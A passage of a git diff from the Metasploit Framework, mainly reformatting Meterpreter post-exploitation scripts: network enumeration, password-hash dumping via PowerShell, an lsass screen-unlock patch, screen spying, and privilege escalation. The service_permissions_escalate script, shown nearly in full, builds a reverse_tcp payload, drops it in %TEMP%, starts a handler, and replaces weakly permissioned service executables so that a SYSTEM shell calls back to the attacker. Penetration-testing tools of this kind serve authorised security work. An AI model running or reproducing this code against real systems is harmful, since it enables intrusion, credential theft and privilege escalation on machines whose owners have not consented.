ipadd.next_ip + if (not ipa) + break + end + iplst << ipa + end begin - iplst.each do |ip| - if i < 10 - a.push(::Thread.new { - r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Name)/ - d.scan(/Name:\s*\S*\s/) do |n| - hostname = n.split(": ") - print_status "\t #{ip} is #{hostname[1].chomp("\n")}" - filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}") - end - break - - end - - end - - r.channel.close - r.close - - }) - i += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 - end - end - a.delete_if {|x| not x.alive?} while not a.empty? - end + iplst.each do |ip| + if i < 10 + a.push(::Thread.new { + r = session.sys.process.execute("nslookup #{ip}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Name)/ + d.scan(/Name:\s*\S*\s/) do |n| + hostname = n.split(": ") + print_status "\t #{ip} is #{hostname[1].chomp("\n")}" + filewrt(dest,"#{ip} is #{hostname[1].chomp("\n")}") + end + break + + end + + end + + r.channel.close + r.close + + }) + i += 1 + else + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 + end + end + a.delete_if {|x| not x.alive?} while not a.empty? + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - + print_status("The following Error was encountered: #{e.class} #{e}") + end end + #------------------------------------------------------------------------------- #Function for Executing Forward Lookups def frwdlp(session,hostlst,domain,dest) @@ -139,38 +142,39 @@ def frwdlp(session,hostlst,domain,dest) threads = [] tmpout = [] begin - if ::File.exists?(hostlst) - ::File.open(hostlst).each {|line| - threads << ::Thread.new(line) { |h| - #print_status("checking #{h.chomp}") - r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Name)/ - d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n| - tmpout << n.split - end - break - end - end - - r.channel.close - r.close + if ::File.exists?(hostlst) + ::File.open(hostlst).each {|line| + threads << ::Thread.new(line) { |h| + #print_status("checking #{h.chomp}") + r = session.sys.process.execute("nslookup #{h.chomp}.#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Name)/ + d.scan(/Name:\s*\S*\s*Address\w*:\s*.*?.*?.*/) do |n| + tmpout << n.split + end + break + end + end + + r.channel.close + r.close + } } - } - threads.each { |aThread| aThread.join } - tmpout.uniq.each do |t| - print_status("\t#{t.join.sub(/Address\w*:/, "\t")}") - filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}") - end - - else - print_status("File #{hostlst}does not exists!") - exit - end + threads.each { |aThread| aThread.join } + tmpout.uniq.each do |t| + print_status("\t#{t.join.sub(/Address\w*:/, "\t")}") + filewrt(dest,"#{t.join.sub(/Address\w*:/, "\t")}") + end + + else + print_status("File #{hostlst}does not exists!") + exit + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") + print_status("The following Error was encountered: #{e.class} #{e}") end end + #------------------------------------------------------------------------------- #Function for Executing Ping Sweep def pingsweep(session,iprange,dest) @@ -184,42 +188,42 @@ def pingsweep(session,iprange,dest) numip = ipadd.num_ips while (iplst.length < numip) ipa = ipadd.next_ip - if (not ipa) - break - end + if (not ipa) + break + end iplst << ipa end begin - iplst.each do |ip| - if i < 10 - a.push(::Thread.new { - r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ /(Reply)/ - print_status "\t#{ip} host found" - filewrt(dest,"#{ip} host found") - r.channel.close - elsif d =~ /(Antwort)/ - print_status "\t#{ip} host found" - filewrt(dest,"#{ip} host found") - r.channel.close - end - end - r.channel.close - r.close - - }) - i += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 - end - end - a.delete_if {|x| not x.alive?} while not a.empty? - end + iplst.each do |ip| + if i < 10 + a.push(::Thread.new { + r = session.sys.process.execute("ping #{ip} -n 1", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ /(Reply)/ + print_status "\t#{ip} host found" + filewrt(dest,"#{ip} host found") + r.channel.close + elsif d =~ /(Antwort)/ + print_status "\t#{ip} host found" + filewrt(dest,"#{ip} host found") + r.channel.close + end + end + r.channel.close + r.close + + }) + i += 1 + else + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 + end + end + a.delete_if {|x| not x.alive?} while not a.empty? + end rescue ::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - + print_status("The following Error was encountered: #{e.class} #{e}") + end end #------------------------------------------------------------------------------- @@ -229,9 +233,10 @@ def srvreclkp(session,domain,dest) srout = [] garbage = [] srvrcd = [ - "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", - "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", - "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."] + "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", + "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", + "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp." + ] print_status("Performing SRV Record Enumeration for #{domain}") filewrt(dest,"SRV Record Enumeration for #{domain}") srvrcd.each do |srv| @@ -276,33 +281,33 @@ srvrc = nil # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - when "-sr" - srvrc = 1 - when "-rl" - rvrslkp = 1 - when "-fl" - frdlkp = 1 - when "-ps" - pngsp = 1 - when "-st" - stdlkp = 1 - when "-d" - dom = val - when "-hl" - hostlist = val - when "-r" - range = val - - when "-h" - print( - "Network Enumerator Meterpreter Script\n" + - "Usage:\n" + - @@exec_opts.usage - ) - helpcall = 1 - end - + when "-sr" + srvrc = 1 + when "-rl" + rvrslkp = 1 + when "-fl" + frdlkp = 1 + when "-ps" + pngsp = 1 + when "-st" + stdlkp = 1 + when "-d" + dom = val + when "-hl" + hostlist = val + when "-r" + range = val + + when "-h" + print( + "Network Enumerator Meterpreter Script\n" + + "Usage:\n" + + @@exec_opts.usage + ) + helpcall = 1 + end } + if client.platform =~ /win32|win64/ if range != nil && pngsp == 1 message(logs) @@ -320,10 +325,9 @@ if client.platform =~ /win32|win64/ message(logs) srvreclkp(session,dom,dest) elsif helpcall == nil - print( - "Network Enumerator Meterpreter Script\n" + - "Usage: \n" + - @@exec_opts.usage) + print("Network Enumerator Meterpreter Script\n" + + "Usage: \n" + + @@exec_opts.usage) end else diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb index eb8ea21edf..1965d47e43 100644 --- a/scripts/meterpreter/panda_2007_pavsrv51.rb +++ b/scripts/meterpreter/panda_2007_pavsrv51.rb @@ -1,4 +1,5 @@ # $Id: panda_2007_pavsrv51.rb 8734 2010-03-07 22:49:08Z mc $ +# $Revision: $ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -13,7 +14,7 @@ # local attacker can gain elevated privileges. # # This script has only been tested against Panda Antivirus 2007. -# +# # BID - 4257 # mc[@]metasploit.com ## @@ -22,9 +23,9 @@ # Options # opts = Rex::Parser::Arguments.new( - "-h" => [ false, "This help menu"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] + "-h" => [ false, "This help menu"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] ) # @@ -38,16 +39,16 @@ rport = 4444 # Option parsing # opts.parse(args) do |opt, idx, val| - case opt - when "-h" - print_status("Panda Antivirus 2007 privilege escalation.") + case opt + when "-h" + print_status("Panda Antivirus 2007 privilege escalation.") print_line(opts.usage) raise Rex::Script::Completed - when "-r" - rhost = val - when "-p" - rport = val.to_i - end + when "-r" + rhost = val + when "-p" + rport = val.to_i + end end if client.platform =~ /win32|win64/ client.sys.process.get_processes().each do |m| diff --git a/scripts/meterpreter/pml_driver_config.rb b/scripts/meterpreter/pml_driver_config.rb index 9c022505f1..f004237842 100644 --- a/scripts/meterpreter/pml_driver_config.rb +++ b/scripts/meterpreter/pml_driver_config.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/scripts/meterpreter/powerdump.rb b/scripts/meterpreter/powerdump.rb index b50480c07b..772efa94b1 100644 --- a/scripts/meterpreter/powerdump.rb +++ b/scripts/meterpreter/powerdump.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry # keys. This script requires you to be running as system in order to work properly. This has currently been @@ -46,12 +47,12 @@ def dumphash(session) begin while ((data = hashes.read) != nil) data=data.strip - puts(data) + print_line(data) end rescue EOFError ensure hashes.close - end + end print_status("Setting Execution policy back to Restricted...") session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true}) print_status("Cleaning up after ourselves...") diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb index 8f90ebf8db..0623cc20f8 100644 --- a/scripts/meterpreter/prefetchtool.rb +++ b/scripts/meterpreter/prefetchtool.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for extracting information from windows prefetch folder #Provided by Milo at keith.lee2012[at]gmail.com #Verion: 0.1.0 @@ -12,13 +13,13 @@ require 'digest/sha1' # Script Options @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-p" => [ false, "List Installed Programs"], - "-c" => [ false, "Disable SHA1/MD5 checksum"], - "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], - "-i" => [ false, "Perform lookup for software name"], - "-l" => [ false, "Download Prefetch Folder Analysis Log"] - ) + "-h" => [ false, "Help menu."], + "-p" => [ false, "List Installed Programs"], + "-c" => [ false, "Disable SHA1/MD5 checksum"], + "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"], + "-i" => [ false, "Perform lookup for software name"], + "-l" => [ false, "Download Prefetch Folder Analysis Log"] +) @tempdir = @session.fs.file.expand_path("%TEMP%") diff --git a/scripts/meterpreter/process_memdump.rb b/scripts/meterpreter/process_memdump.rb index a5a404341d..2b3c18560a 100644 --- a/scripts/meterpreter/process_memdump.rb +++ b/scripts/meterpreter/process_memdump.rb @@ -27,9 +27,9 @@ opts.parse(args) { |opt, idx, val| when "-h" print_line("") print_line("USAGE:") - print_line("EXAMPLE: run process_dump putty.exe") - print_line("EXAMPLE: run process_dump -p 1234") - print_line(opts.usage) + print_line("EXAMPLE: run process_dump putty.exe") + print_line("EXAMPLE: run process_dump -p 1234") + print_line(opts.usage) raise Rex::Script::Completed when "-p" pid = val @@ -40,15 +40,15 @@ opts.parse(args) { |opt, idx, val| when "-q" query = true when "-r" - list = val + list = val resource = "" - if not ::File.exists?(list) - raise "Command List File does not exists!" - else - ::File.open(list, "r").each_line do |line| - resource << line - end - end + if not ::File.exists?(list) + raise "Command List File does not exists!" + else + ::File.open(list, "r").each_line do |line| + resource << line + end + end end } @@ -107,7 +107,7 @@ def dump_mem(pid,name, toggle) base_size += mbi["RegionSize"] end print_status("Saving Dumped Memory to #{dumpfile}") - + end # Function to query process Size diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb index 22c68f4fc6..068a4b8512 100644 --- a/scripts/meterpreter/remotewinenum.rb +++ b/scripts/meterpreter/remotewinenum.rb @@ -11,10 +11,10 @@ rpass = nil trg = "" # Script Options @@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu."], - "-t" => [ true, "The target address"], - "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], - "-p" => [ true, "Password of user on target system"] + "-h" => [ false, "Help menu."], + "-t" => [ true, "The target address"], + "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], + "-p" => [ true, "Password of user on target system"] ) # Create Filename info to be appended to downloaded files @@ -57,28 +57,28 @@ def wmicexec(session,wmic,user,pass,trgt) tmpout = '' command = nil runfail = 0 - runningas = session.sys.config.getuid + runningas = session.sys.config.getuid begin - tmp = session.fs.file.expand_path("%TEMP%") - # Temporary file on windows host to store results - wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" - - wmic.each do |wmi| - if user == nil - print_status("The commands will be ran under the credentials of #{runningas}") - command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" - else - command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" - end - print_status "\trunning command wimic #{wmi}" - r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) - sleep(1) - #print_status "\twmic #{command}" - r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) + tmp = session.fs.file.expand_path("%TEMP%") + # Temporary file on windows host to store results + wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" + + wmic.each do |wmi| + if user == nil + print_status("The commands will be ran under the credentials of #{runningas}") + command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" + else + command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" + end + print_status "\trunning command wimic #{wmi}" + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + #print_status "\twmic #{command}" + r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) #Making sure that wmic finishes before executing next wmic command prog2check = "wmic.exe" found = 0 @@ -92,17 +92,17 @@ def wmicexec(session,wmic,user,pass,trgt) end end end - r.close - end - # Read the output file of the wmic commands - wmioutfile = session.fs.file.new(wmicfl, "rb") - until wmioutfile.eof? - tmpout << wmioutfile.read - end - # Close output file in host - wmioutfile.close + r.close + end + # Read the output file of the wmic commands + wmioutfile = session.fs.file.new(wmicfl, "rb") + until wmioutfile.eof? + tmpout << wmioutfile.read + end + # Close output file in host + wmioutfile.close rescue ::Exception => e - print_status("Error running WMIC commands: #{e.class} #{e}") + print_status("Error running WMIC commands: #{e.class} #{e}") end # We delete the file with the wmic command output. c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true}) @@ -123,21 +123,19 @@ def headerbuid(session,target,dest) header << "\n\n\n" print_status("Saving report to #{dest}") - header + header end #------------------------------------------------------------------------------ # Function Help Message def helpmsg - print( - "Remote Windows Enumeration Meterpreter Script\n" + - "This script will enumerate windows hosts in the target enviroment\n" + - "given a username and password or using the credential under witch\n" + - "Meterpeter is running using WMI wmic windows native tool.\n" + - "Usage:\n" + - @@exec_opts.usage - ) + print("Remote Windows Enumeration Meterpreter Script\n" + + "This script will enumerate windows hosts in the target enviroment\n" + + "given a username and password or using the credential under witch\n" + + "Meterpeter is running using WMI wmic windows native tool.\n" + + "Usage:\n" + + @@exec_opts.usage) end ################## MAIN ################## if client.platform =~ /win32|win64/ diff --git a/scripts/meterpreter/scheduleme.rb b/scripts/meterpreter/scheduleme.rb index af76c1bf2b..2190f46808 100644 --- a/scripts/meterpreter/scheduleme.rb +++ b/scripts/meterpreter/scheduleme.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for automating the most common scheduling tasks #during a pentest. This script will use the schtasks command so as diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb index 39745b4a5f..b8081f7c3d 100644 --- a/scripts/meterpreter/schelevator.rb +++ b/scripts/meterpreter/schelevator.rb @@ -1,5 +1,6 @@ ## # $Id$ +# $Revision$ ## ## diff --git a/scripts/meterpreter/schtasksabuse.rb b/scripts/meterpreter/schtasksabuse.rb index d698977950..12d0318911 100644 --- a/scripts/meterpreter/schtasksabuse.rb +++ b/scripts/meterpreter/schtasksabuse.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ #Meterpreter script for abusing the scheduler service in windows #by scheduling and running a list of command against one or more targets @@ -127,20 +128,20 @@ end script = val if not ::File.exists?(script) raise "Command List File does not exists!" - else - ::File.open(script, "r").each_line do |line| + else + ::File.open(script, "r").each_line do |line| commands << line.chomp end - end + end when "-l" list = val if not ::File.exists?(list) raise "Command List File does not exists!" - else - ::File.open(list, "r").each_line do |line| + else + ::File.open(list, "r").each_line do |line| targets << line.chomp end - end + end when "-h" help = 1 end diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb index 6f44439c35..c6e51123ce 100644 --- a/scripts/meterpreter/screen_unlock.rb +++ b/scripts/meterpreter/screen_unlock.rb @@ -1,10 +1,14 @@ # +# $Id$ +# # Script to unlock a windows screen by L4teral # Needs system prvileges to run and known signatures for the target system. # This script patches msv1_0.dll loaded by lsass.exe # # Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16 # +# $Revision$ +# revert = false targets = [ @@ -40,7 +44,7 @@ os = client.sys.config.sysinfo['OS'] targets.each do |t| if os =~ t[:os] - target = t + target = t print_status("OS '#{os}' found in known targets") pid = client.sys.process["lsass.exe"] p = client.sys.process.open(pid, PROCESS_ALL_ACCESS) diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb index 7cadba211b..e10eb2892e 100644 --- a/scripts/meterpreter/screenspy.rb +++ b/scripts/meterpreter/screenspy.rb @@ -1,7 +1,7 @@ # $Id$ # $Revision$ # Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com -# +# # Thie script will open an interactive view of remote hosts # You will need firefox installed on your machine @@ -9,9 +9,9 @@ require 'fileutils' opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ], - "-d" => [ true, "The Delay in seconds between each screenshot." ], - "-t" => [ true, "The time to run in sec." ], + "-h" => [ false, "Help menu." ], + "-d" => [ true, "The Delay in seconds between each screenshot." ], + "-t" => [ true, "The time to run in sec." ], "-s" => [ true, "The local system linux/windows" ] ) @@ -22,28 +22,28 @@ meter_type = client.platform localsys = "linux" opts.parse(args) { |opt, idx, val| - case opt - when '-d' - freq = val.to_i - when '-t' - count = val.to_i + case opt + when '-d' + freq = val.to_i + when '-t' + count = val.to_i when '-s' - localsys = val.to_s - - when "-h" + localsys = val.to_s + + when "-h" + print_line + print_line "Screenspy v1.0" + print_line "--------------" print_line - print_line "Screenspy v1.0" - print_line "--------------" - print_line print_line print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long." print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long." print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode." print_line print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com" - print_line(opts.usage) - raise Rex::Script::Completed - end + print_line(opts.usage) + raise Rex::Script::Completed + end } # Wrong Meterpreter Version Message Function @@ -72,7 +72,7 @@ outfile = ::File.join(Msf::Config.log_directory,file) begin process2mig = "explorer.exe" - + # Actual migration mypid = session.sys.process.getpid session.sys.process.get_processes().each do |x| @@ -100,9 +100,9 @@ begin f2.puts(data) end - + if (localsys == "windows") - + print_status("Runing in local mode => windows") print_status("Opening Interactive view...") localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\"" @@ -111,33 +111,35 @@ begin print_status("Opening Interactive view...") localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html&\"" end - + system (localcmd) - (1..count).each do |i| + (1..count).each do |i| sleep(freq) if(i != 1) path = File.join(logs,"screenshot.jpeg") - data = session.espia.espia_image_get_dev_screen - - if(data) - ::File.open(path, 'wb') do |fd| - fd.write(data) + data = session.espia.espia_image_get_dev_screen + + if(data) + ::File.open(path, 'wb') do |fd| + fd.write(data) fd.close() end - end - - - + end end + rescue ::Exception => e print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}") end print_status("The interactive Session ended...") - data="#{host} - Interactive Session ended" - File.open(path1, 'w') do |f2| + data = <<-EOS +#{host} - Interactive Session ended + + +EOS + File.open(path1, 'w') do |f2| f2.puts(data) - end - + end + rescue ::Exception => e print_status("Exception: #{e.class} #{e} #{e.backtrace}") end diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index 3cb7b1eac9..9562457d46 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ ## Meterpreter script that recursively search and download ## files matching a given pattern diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb index 2081f66054..5647079650 100644 --- a/scripts/meterpreter/service_permissions_escalate.rb +++ b/scripts/meterpreter/service_permissions_escalate.rb @@ -1,201 +1,203 @@ -## -# $Id: service_permissions_escalate.rb scriptjunkie $ -# -# Many services are configured with insecure permissions. This -# script attempts to create a service, then searches through a list of -# existing services to look for insecure file or configuration -# permissions that will let it replace the executable with a payload. -# It will then attempt to restart the replaced service to run the -# payload. If that fails, the next time the service is started (such as -# on reboot) the attacker will gain elevated privileges. -# -# scriptjunkie googlemail com -## - -if client.platform !~ /win32/ - print_error("This version of Meterpreter is not supported with this Script!") - raise Rex::Script::Completed -end -# -# Options -# -opts = Rex::Parser::Arguments.new( - "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"], - "-h" => [ false, "This help menu"], - "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], - "-p" => [ true, "The port on the remote host where Metasploit is listening"] -) - -# -# Default parameters -# - -rhost = Rex::Socket.source_address("1.2.3.4") -rport = 4444 -aggressive = false - -# -# Option parsing -# -opts.parse(args) do |opt, idx, val| - case opt - when "-a" - aggressive = true - when "-h" - print_status("Generic weak service permissions privilege escalation.") - print_line(opts.usage) - raise Rex::Script::Completed - when "-r" - rhost = val - when "-p" - rport = val.to_i - end -end - -# Get the exe payload. -pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") -pay.datastore['LHOST'] = rhost -pay.datastore['LPORT'] = rport -raw = pay.generate -exe = Msf::Util::EXE.to_win32pe(client.framework, raw) -#and placing it on the target in %TEMP% -tempdir = client.fs.file.expand_path("%TEMP%") -tempexename = Rex::Text.rand_text_alpha((rand(8)+6)) -tempexe = tempdir + "\\" + tempexename + ".exe" -print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}") -fd = client.fs.file.new(tempexe, "wb") -fd.write(exe) -fd.close - -#get handler to be ready -handler = client.framework.exploits.create("multi/handler") -handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" -handler.datastore['LHOST'] = rhost -handler.datastore['LPORT'] = rport -handler.datastore['InitialAutoRunScript'] = "migrate -f" -handler.datastore['ExitOnSession'] = false -#start a handler to be ready -handler.exploit_simple( - 'Payload' => handler.datastore['PAYLOAD'], - 'RunAsJob' => true -) - -#attempt to make new service -client.railgun.kernel32.LoadLibraryA("advapi32.dll") -client.railgun.get_dll('advapi32') -client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ] -]) - -#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config - -print_status("Trying to add a new service...") -adv = client.railgun.advapi32 -manag = adv.OpenSCManagerA(nil,nil,0x10013) -if(manag["return"] != 0) - # SC_MANAGER_CREATE_SERVICE = 0x0002 - newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil) - #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 - #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 - if(newservice["return"] != 0) - print_status("Created service... #{newservice["return"]}") - ret = adv.StartServiceA(newservice["return"], 0, nil) - print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.") - service_delete("walservice") - adv.CloseServiceHandle(newservice["return"]) - if aggressive == false - adv.CloseServiceHandle(manag["return"]) - raise Rex::Script::Completed - end - else - print_status("Uhoh. service creation failed, but we should have the permissions. :-(") - end -else - print_status("No privs to create a service...") - manag = adv.OpenSCManagerA(nil,nil,1) - if(manag["return"] == 0) - print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.") - end -end -print_status("Trying to find weak permissions in existing services..") -#Search through list of services to find weak permissions, whether file or config -serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" -#for each service -service_list.each do |serv| - begin - srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s - if srvtype != "16" - continue - end - moved = false - configed = false - #default path, but there should be an ImagePath registry key - source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe") - #get path to exe; parse out quotes and arguments - sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s - sourcemaybe = client.fs.file.expand_path(sourceorig) - if( sourcemaybe[0] == '"' ) - sourcemaybe = sourcemaybe.split('"')[1] - else - sourcemaybe = sourcemaybe.split(' ')[0] - end - begin - client.fs.file.stat(sourcemaybe) #check if it really exists - source = sourcemaybe - rescue - print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}") - end - #try to exploit weak file permissions - if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"]) - client.railgun.kernel32.CopyFileA(tempexe, source, false) - print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.") - moved = true - end - #try to exploit weak config permissions - #open with SERVICE_CHANGE_CONFIG (0x0002) - servhandleret = adv.OpenServiceA(manag["return"],serv,2) - if(servhandleret["return"] != 0) - #SERVICE_NO_CHANGE is 0xFFFFFFFF - if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil)) - print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.") - configed = true - end - adv.CloseServiceHandle(servhandleret["return"]) - - end - if(moved != true && configed != true) - print_status("No exploitable weak permissions found on #{serv}") - continue - end - print_status("Restarting #{serv}") - #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020) - servhandleret = adv.OpenServiceA(manag["return"],serv,0x30) - if(servhandleret["return"] != 0) - #SERVICE_CONTROL_STOP = 0x00000001 - if(adv.ControlService(servhandleret["return"],1,56)) - client.railgun.kernel32.Sleep(1000) - adv.StartServiceA(servhandleret["return"],0,nil) - print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.") - #Cleanup - if moved == true - client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1) - end - if configed == true - servhandleret = adv.OpenServiceA(manag["return"],serv,2) - adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil) - adv.CloseServiceHandle(servhandleret["return"]) - end - if aggressive == false - raise Rex::Script::Completed - end - else - print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") - end - adv.CloseServiceHandle(servhandleret["return"]) - else - print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)") - end - rescue - end -end - +## +# $Id$ +# +# Many services are configured with insecure permissions. This +# script attempts to create a service, then searches through a list of +# existing services to look for insecure file or configuration +# permissions that will let it replace the executable with a payload. +# It will then attempt to restart the replaced service to run the +# payload. If that fails, the next time the service is started (such as +# on reboot) the attacker will gain elevated privileges. +# +# scriptjunkie googlemail com +# +# $Revision$ +## + +if client.platform !~ /win32/ + print_error("This version of Meterpreter is not supported with this Script!") + raise Rex::Script::Completed +end +# +# Options +# +opts = Rex::Parser::Arguments.new( + "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"], + "-h" => [ false, "This help menu"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] +) + +# +# Default parameters +# + +rhost = Rex::Socket.source_address("1.2.3.4") +rport = 4444 +aggressive = false + +# +# Option parsing +# +opts.parse(args) do |opt, idx, val| + case opt + when "-a" + aggressive = true + when "-h" + print_status("Generic weak service permissions privilege escalation.") + print_line(opts.usage) + raise Rex::Script::Completed + when "-r" + rhost = val + when "-p" + rport = val.to_i + end +end + +# Get the exe payload. +pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") +pay.datastore['LHOST'] = rhost +pay.datastore['LPORT'] = rport +raw = pay.generate +exe = Msf::Util::EXE.to_win32pe(client.framework, raw) +#and placing it on the target in %TEMP% +tempdir = client.fs.file.expand_path("%TEMP%") +tempexename = Rex::Text.rand_text_alpha((rand(8)+6)) +tempexe = tempdir + "\\" + tempexename + ".exe" +print_status("Preparing connect back payload to 